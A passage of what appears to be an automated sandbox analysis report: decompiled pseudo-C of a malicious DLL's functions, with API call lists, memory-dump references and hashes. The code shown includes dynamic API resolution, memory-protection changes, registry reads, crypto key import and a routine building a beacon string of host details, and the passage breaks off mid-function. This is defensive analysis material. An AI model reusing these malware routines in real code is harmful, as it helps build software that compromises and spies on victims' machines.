                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					HeapFree( *0x6e054190, 0, _v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t25;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrStrIA.KERNELBASE(00000000,6E051810,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C69
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C83
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a8c69f6fd2c161090299444506d1ca4a1b7494e1b1aed1173e03ca88bea29408
                                                                                                                                                                                                                                                                                    • Instruction ID: 3cc8f4539aeacf67c67bfc5bc59ee2263e406133ad668edc347705e37db3ad55
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8c69f6fd2c161090299444506d1ca4a1b7494e1b1aed1173e03ca88bea29408
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64018476900915BB9B00CEE5CE54FDF7BFDEB89640F100161E601E7244D731DE159BA4
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                                                                    			E00A74BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                                    				short _t17;
                                                                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                                                                    				short _t23;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                                                                    				_t15 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_t4 = _t15 + 0xa7b394; // 0x556893c
                                                                                                                                                                                                                                                                                    				_t20 = _t4;
                                                                                                                                                                                                                                                                                    				_t6 = _t15 + 0xa7b124; // 0x650047
                                                                                                                                                                                                                                                                                    				_t17 = E00A77471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                                                                    				if(_t17 < 0) {
                                                                                                                                                                                                                                                                                    					_t23 = _t17;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_v20 != 8) {
                                                                                                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t19 = E00A74C7C(_t20, _v12);
                                                                                                                                                                                                                                                                                    						if(_t19 == 0) {
                                                                                                                                                                                                                                                                                    							_t23 = 8;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *_a16 = _t19;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__imp__#6(_v12);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A77471: SysFreeString.OLEAUT32(?), ref: 00A77550
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A777C1,004F0053,00000000,?), ref: 00A74C85
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A777C1,004F0053,00000000,?), ref: 00A74CAF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74C7C: memset.NTDLL ref: 00A74CC3
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00A74C65
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 397948122-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c78353c0d15ace8950d71798e96092cb488a16c26734e8e18a7686e9c425a980
                                                                                                                                                                                                                                                                                    • Instruction ID: b9abb3d46e8eb784b56ef7fe4e0f69bed56eee237d7e5212f2201562114c250e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c78353c0d15ace8950d71798e96092cb488a16c26734e8e18a7686e9c425a980
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87015A32501029BFEB12ABA8CD44DAEBBB9FB48710F00C565EA59E6021D3709A519791
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                    			E6E051236(void* __eax) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t41 = __eax;
                                                                                                                                                                                                                                                                                    				_t16 =  *0x6e0541cc;
                                                                                                                                                                                                                                                                                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4);
                                                                                                                                                                                                                                                                                    				_t18 = E6E051AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    					_t29 = 8;
                                                                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t40 = _v8;
                                                                                                                                                                                                                                                                                    					_t29 = E6E0514DE(_t33, _t40, _t41);
                                                                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                                                                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                                                                                                                                                                    						_t24 = E6E051F31(_t40, _t44); // executed
                                                                                                                                                                                                                                                                                    						_t29 = _t24;
                                                                                                                                                                                                                                                                                    						if(_t29 == 0) {
                                                                                                                                                                                                                                                                                    							_t26 = E6E051030(_t44, _t40); // executed
                                                                                                                                                                                                                                                                                    							_t29 = _t26;
                                                                                                                                                                                                                                                                                    							if(_t29 == 0) {
                                                                                                                                                                                                                                                                                    								_push(_t26);
                                                                                                                                                                                                                                                                                    								_push(1);
                                                                                                                                                                                                                                                                                    								_push(_t40);
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                                                                                                                                                                    									_t29 = GetLastError();
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t42 = _v12;
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                                                                                                                                                                    					E6E05136A(_t42);
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return _t29;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E051272,?,?,?,?,00000002,00000000,?,?), ref: 6E051AC9
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051AEB
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B01
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B17
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B2D
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B43
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0514DE: memcpy.NTDLL(00000000,00000002,6E051280,?,?,?,?,?,6E051280,?,?,?,?,?,?,00000002), ref: 6E05150B
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0514DE: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6E05153E
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E051F69
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051030: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E051069
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0510DE
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051030: GetLastError.KERNEL32 ref: 6E0510E4
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 6E0512B4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2673762927-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f52aa438a766c335b5414470e7fe2c81a9ec8cca932a9dcab5885dee210a2292
                                                                                                                                                                                                                                                                                    • Instruction ID: d774ba9ea69c9063aeeb1874a9291d248ae7b30bea0963dfb6b4ed83fd706814
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f52aa438a766c335b5414470e7fe2c81a9ec8cca932a9dcab5885dee210a2292
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D110876600B056BD7119EE9CE80FDB77BCAF583447040959E901D7745E7B0ED2A87A0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00A730AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                                                                                                                    				signed short _t18;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                                                                    				signed short _t27;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_t18 = E00A74BFF(_a4, _a8, _a12, __esi); // executed
                                                                                                                                                                                                                                                                                    					_t27 = _t18;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t27 = E00A75419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                                                                                                                    					if(_t27 == 0) {
                                                                                                                                                                                                                                                                                    						_t26 = _a8 >> 1;
                                                                                                                                                                                                                                                                                    						if(_t26 == 0) {
                                                                                                                                                                                                                                                                                    							_t27 = 2;
                                                                                                                                                                                                                                                                                    							HeapFree( *0xa7a290, 0, _a12);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t24 = _a12;
                                                                                                                                                                                                                                                                                    							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                                                                                                                                                                                                                                                    							 *__esi = _t24;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t27;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00A72115,3D00A790,80000002,00A77319,00000000,00A77319,?,65696C43,80000002), ref: 00A7545B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00A72115,3D00A790,80000002,00A77319,00000000,00A77319,?,65696C43), ref: 00A75480
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75419: RegCloseKey.ADVAPI32(80000002,?,00A72115,3D00A790,80000002,00A77319,00000000,00A77319,?,65696C43,80000002,00000000,?), ref: 00A754B0
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00A74A79,?,004F0053,05569338,00000000,?), ref: 00A730F8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: QueryValue$CloseFreeHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2109406458-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c5de7fbb9af70e189806e0a1b87fb51943c2965e736417dc8701b5c6a08011eb
                                                                                                                                                                                                                                                                                    • Instruction ID: a48a7ceea5dc2afa06810016f80c97c364c38ba8404de1f10170b4a4a2b9cbe4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5de7fbb9af70e189806e0a1b87fb51943c2965e736417dc8701b5c6a08011eb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4014632240249FBCF129F84CC02FAA3B7AEB94350F56C029FA1D8A161D631DA21EB50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                    			E00A71AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t11 =  &_a4;
                                                                                                                                                                                                                                                                                    				_t21 = 0;
                                                                                                                                                                                                                                                                                    				__imp__( &_a8);
                                                                                                                                                                                                                                                                                    				_t13 = E00A735A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                                                                                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                                                                                                    					_t21 = E00A75C4E(_a8 + _a8);
                                                                                                                                                                                                                                                                                    					if(_t21 != 0) {
                                                                                                                                                                                                                                                                                    						E00A74502(_a4, _t21, _t23);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00A72A03(_a4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t21;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A71B02
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A735A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00A71B16,00000001,00A76301,00000000), ref: 00A735D9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A735A1: memcpy.NTDLL(00A71B16,00A76301,00000010,?,?,?,00A71B16,00000001,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000), ref: 00A735F2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A735A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00A7361B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A735A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00A73633
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A735A1: memcpy.NTDLL(00000000,00000000,05569630,00000010), ref: 00A73685
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 894908221-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bc4980bf3eb9eb69196766b51580061fdd1cee22a0f88a07f5048ad8a43c152c
                                                                                                                                                                                                                                                                                    • Instruction ID: 0e191242013cbc5ac57fcbc5cf432351daa35a2fa16b70a64259926014920092
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc4980bf3eb9eb69196766b51580061fdd1cee22a0f88a07f5048ad8a43c152c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF0DA76100508BACF12AF69DD01DEB7FADEF853A0B01C022BD1D8A111EA71DA559BA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                    			E00A75872(intOrPtr* __edi) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t21 = __edi;
                                                                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                                                                                                    				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                                                                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_v16 = _t15;
                                                                                                                                                                                                                                                                                    					Sleep(0x1f4); // executed
                                                                                                                                                                                                                                                                                    					if(_v12 == 4) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                                                                    							_v16 = 0x80004004;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return _v16;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00A758BA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e228daa87f14fe70f106c7ee188cb7998945a1c799d8d54b81bc7aee3e9e8ad8
                                                                                                                                                                                                                                                                                    • Instruction ID: 21ffbdad220922170f0ec668e0c44eb915d93e8e852b6aed0cf3fe1efad30e09
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e228daa87f14fe70f106c7ee188cb7998945a1c799d8d54b81bc7aee3e9e8ad8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3F0EC76D01618EFDB00DBA4C888AEDB7B8EF05305F14C4AAE506A7240D7B45B84DF56
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                    			E00A76124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xa7a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xa7a018; // 0x785c6176
					asm("bswap eax");
					_t32 =  *0xa7a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xa7a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xa7a00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0xa7a2d0; // 0x4aed5a8
					_t2 = _t35 + 0xa7b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0xa7a02c,  *0xa7a004, _t110);
					_t38 = E00A7271A();
					_t39 =  *0xa7a2d0; // 0x4aed5a8
					_t3 = _t39 + 0xa7b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xa7a2d0; // 0x4aed5a8
						_t7 = _t92 + 0xa7b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00A72956(_t99);
					_t44 =  *0xa7a2d0; // 0x4aed5a8
					_t9 = _t44 + 0xa7b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xa7a2d0; // 0x4aed5a8
					_t11 = _t48 + 0xa7b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xa7a328; // 0x55695b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xa7a2d0; // 0x4aed5a8
						_t13 = _t88 + 0xa7b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xa7a37c; // 0x5569630
					_a28 = E00A75741(0xa7a00a, _t105 + 4);
					_t55 =  *0xa7a318; // 0x55695e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xa7a2d0; // 0x4aed5a8
						_t16 = _t84 + 0xa7b8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xa7a314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xa7a2d0; // 0x4aed5a8
						_t18 = _t81 + 0xa7b8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
